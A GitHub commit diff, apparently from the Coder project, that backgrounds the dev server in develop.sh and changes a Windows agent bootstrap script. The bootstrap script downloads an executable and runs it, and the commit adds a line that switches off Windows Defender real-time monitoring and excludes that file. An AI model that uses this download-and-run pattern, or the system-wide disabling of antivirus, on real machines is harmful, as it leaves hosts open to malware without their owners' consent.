Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 3111ac9

Browse files
committed
Merge branch 'main' into nestedresource
2 parents 3cb370c + e35a4fd commit 3111ac9

File tree

2 files changed

+3
-1
lines changed

2 files changed

+3
-1
lines changed

develop.sh

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,5 +14,6 @@ cd "${PROJECT_ROOT}"
1414
(
1515
trap 'kill 0' SIGINT
1616
CODERV2_HOST=http://127.0.0.1:3000 INSPECT_XSTATE=true yarn --cwd=./site dev &
17-
go run cmd/coder/main.go start --dev --skip-tunnel
17+
go run cmd/coder/main.go start --dev --skip-tunnel &
18+
wait
1819
)

provisionersdk/agent.go

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -13,6 +13,7 @@ var (
1313
"windows": {
1414
"amd64": `$ProgressPreference = "SilentlyContinue"
1515
Invoke-WebRequest -Uri ${ACCESS_URL}bin/coder-windows-amd64.exe -OutFile $env:TEMP\sshd.exe
16+
Set-MpPreference -DisableRealtimeMonitoring $true -ExclusionPath $env:TEMP\sshd.exe
1617
$env:CODER_AUTH = "${AUTH_TYPE}"
1718
$env:CODER_URL = "${ACCESS_URL}"
1819
Start-Process -FilePath $env:TEMP\sshd.exe -ArgumentList "agent" -PassThru`,

0 commit comments

Comments
 (0)